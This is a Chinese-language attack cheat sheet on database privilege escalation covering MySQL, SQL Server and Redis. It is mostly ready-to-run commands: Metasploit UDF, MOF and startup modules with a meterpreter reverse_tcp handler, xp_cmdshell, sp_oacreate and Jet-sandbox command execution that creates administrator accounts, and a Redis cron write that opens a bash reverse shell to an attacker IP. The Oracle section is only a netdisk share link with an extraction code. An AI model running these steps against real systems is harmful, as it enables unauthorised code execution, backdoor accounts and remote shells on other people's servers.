数据库提权

数据库提权

Mysql

udf提权（用户自定义函数）

条件：

开启外部连接

知道账户密码(配置文件)

有写入权限

开启数据库外联
mysql> use mysql;
mysql> GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;
mysql> flush privileges;

关闭数据库外联
mysql> use mysql;
mysql> DELETE FROM user WHERE User="root" and Host="%"; 
mysql> FLUSH PRIVILEGES;

udf存放路径：

mysql <5.1 c:/windows 或 system32

mysql>=5.1 /lib/plugin

select version();		//获取版本

select @@basedir;	//获取mysql安装目录

show global variables like '%secure%';  //查看是否有写入权限（secure_file_priv= )
如何更改secure_file_priv的值：
windows下:
修改my.ini 在[mysqld]内加入secure_file_priv=""
linux下：
修改my.cnf 在[mysqld]内加入secure_file_priv=""
MYSQL新特性secure_file_priv对读写文件的影响
然后重启mysql，再查询secure_file_priv

注意：

linux：   .so
windows:  .dll

msf生成dll

use exploit/multi/mysql/mysql_udf_payload
set payload windows/meterpreter/reverse_tcp
set password root
set username root
set rhosts 192.168.x.x
run

qlmap生成dll

sqlmap\data\udf\mysql\windows\32	//dll路径
sqlmap\extra\cloak					//解密模块路径
python cloak.py -d -i 你的dll加密文件		//解密dll

 

select * from mysql.func where name = "sys_exec"; 	//查看绑定是否成功
create function sys_eval returns string soname "你的dll文件名.dll";	//创建函数绑定dll，dll的名字和查看的名字要一致
select sys_eval('要执行的命令');

mof提权

开启外部连接

my.ini中secure_file_priv为空

有写入权限

win2003以前

use exploit/windows/mysql/mysql_mof
set password root
set username root
set rhosts 192.168.x.x
run

启动项提权

启动项路径
#2003
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
#2008
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
#2012
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

use exploit/windows/mysql/mysql_start_up
set password root
set username root
set rhosts 192.168.x.x
set AllowNoCleanup true
run
```
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 攻击者ip
set lport 4444
run

Sqlserver

xp_cmdshell提权

开启xp_cmdshell
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;
关闭xp_cmdshell
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell', 0;reconfigure
提权
exec master..xp_cmdshell 'net user test pinohd123. /add'    添加用户test，密码test
exec master..xp_cmdshell 'net localgroup administrators test add'    添加test用户到管理员组

查看
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
开启
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE
关闭
```
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell',0
RECONFIGURE
执行系统命令
exec xp_cmdshell "whoami"
EXEC master..xp_cmdshell "whoami"
EXEC master.dbo.xp_cmdshell "ipconfig"

sp_oacreate

查看

```
select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE';
```

启用

```
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'Ole Automation Procedures',1;
reconfigure;
```

执行命令

写入文件

```
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\sqltest.txt';
```

删除文件

```
declare @result int
declare @fso_token int
exec sp_oacreate 'scripting.filesystemobject', @fso_token out
exec sp_oamethod @fso_token,'deletefile',null,'c:\sqltest.txt'
exec sp_oadestroy @fso_token
```

沙盒提权

查看

```
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c whoami")')
```

开启组件

```
exec sp_configure 'show advanced options',1 ;
reconfigure ;
exec sp_configure 'Ad Hoc Distributed Queries',1 ;
reconfigure;
```

//   关闭组件

```
exec sp_configure 'show advanced options',1 ;
reconfigure ;
exec sp_configure 'Ad Hoc Distributed Queries',0 ;
reconfigure;
```

关闭沙盒

```
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
```

查询命令

```
exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'
```

> 沙盒模式SandBoxMode参数含义（默认是2）
0：在任何所有者中禁止启用安全模式
1：为仅在允许范围内
2：必须在access模式下
3：完全开启

执行系统命令

```
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c 要执行的命令 >c:\\sqltest.txt ")');
```

创建用户并加到管理员组

```
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user testq QWEasd123 /add")');
Select * From OpenRowSet('microsoft.jet.oledb.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators testq /add")');
Select * From OpenRowSet('microsoft.jet.oledb.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user testq")');
```

Oracle

链接：百度网盘 请输入提取码

提取码：6666

--来自百度网盘超级会员V4的分享

redis

利用计划任务执行命令反弹shell

条件：

有root账户密码或者Redis存在未授权访问漏洞。

通过未授权漏洞连接Redis或通过配置文件找到Redis密码进行连接。

执行命令：

set x "\n* * * * * bash -i > &/dev/tcp/接受反弹回话的公网IP/端口 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

写ssh-keygen公钥使用私钥登录